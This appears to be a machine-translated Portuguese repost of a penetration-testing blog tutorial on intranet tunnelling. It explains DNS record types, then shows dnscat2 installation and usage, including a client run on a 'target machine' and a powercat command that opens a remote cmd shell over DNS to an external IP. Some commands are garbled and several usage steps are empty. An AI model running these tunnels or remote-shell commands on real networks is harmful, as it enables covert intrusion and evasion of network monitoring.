Proxy de túnel de penetração da intranet

Others 2020-10-15 16:42:36 views: null

Cenário: depois de entrar na intranet, muitos agentes, ferramentas de penetração e tunelamento são necessários. Existem muitas variedades e tipos completos e não há fim para o aprendizado. Vou resumir e registrar, e o acompanhamento continuará atualizando o resumo.

1. Túnel DNS

DNS (Domain Name System, Domain Name System), um banco de dados distribuído na World Wide Web como um mapeamento entre nomes de domínio e endereços IP, permite que os usuários acessem a Internet de forma mais conveniente, sem ter que lembrar os números IP que podem ser lidos diretamente pelas máquinas. Através do nome de domínio, o processo de finalmente obter o endereço IP correspondente ao nome de domínio é denominado resolução de nome de domínio (ou resolução de nome de host). Na plataforma Windows, use a ferramenta de linha de comando e digite nslookup. O resultado retornado inclui o endereço IP (registro A) e o alias (registro CNAME) correspondentes ao nome de domínio. Além dos métodos acima, você também pode consultar as informações DNS do nome de domínio por meio de alguns sites de consulta DNS, como estrangeiro e doméstico.

Um endereço Este registro lista o endereço IP de um nome de host específico. Este é um registro importante de resolução de nomes.

Nome padrão CNAME Este registro especifica o alias do nome do host padrão.

MX mail exchangeger Este registro lista o host responsável por receber emails enviados ao domínio.

Servidor de nomes NS Este registro especifica o servidor de nomes responsável por uma determinada área.

1 , dnscat2

O software dnscat2 é uma ferramenta de transmissão ponta a ponta que usa o protocolo DNS. Suporta criptografia de comunicação, autenticação e várias sessões. É semelhante a um túnel SSH, mas os dados de transmissão são mais ocultos. Suporta os tipos de consulta DNS mais populares (TXT, MX, CNAME, A). , AAAA). O cliente dnscat2 é escrito em linguagem C e o servidor é escrito em ruby.

Instalação de servidor


$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle install

Instalação de cliente Linux


$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make

instalação do cliente windows

Você precisa compilar sozinho (VS 2008) ou fazer o download da versão: https://downloads.skullsecurity.org/dnscat2/

  • Como usar 1

Servidor em execução: ruby ​​dnscat.rb

(Máquina de destino) Cliente em execução: ./dnscat --dns server = 103.vps.219, porta = 53

A conexão foi estabelecida e há uma sessão no servidor

O comando ping é executado com sucesso e o cliente responde

  • Como usar 2 (conexão direta)

Servidor:

Cliente:

  • Como usar 3

Servidor: ruby./dnscat2.rb abc.com --secret = 123456 --security = open --no-cache

Cliente:

Import-Module. \ Powercat.ps1

powercat -c 103.45.98.219 -p 53 -dns abc.com -e cmd

resultado da operação:

Consulte o artigo do chefe:

https://mp.weixin.qq.com/s/KH-Y_8Df2COINksR6cbB2w

https://blog.csdn.net/localhost01/article/details/86591685

https://mp.weixin.qq.com/s/7kNISpuqFFVTbmal9z6AJA

https://mp.weixin.qq.com/s/vjmCX6JhdVeURCrhuMK4Aw

https://mp.weixin.qq.com/s/yccot8vJw9yNLOrwUshkLQ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Acho que você gosta

Origin blog.csdn.net/qq_32393893/article/details/108937500
Recomendado
Clasificación
Diario
Más
2024-05-23(35)
2024-05-22(9)
2024-05-21(34)
2024-05-20(5)
2024-05-19(0)
2024-05-18(32)
2024-05-17(5)
2024-05-16(24)
2024-05-15(5)
2024-05-14(11)

Code World

© 2018 codetd.com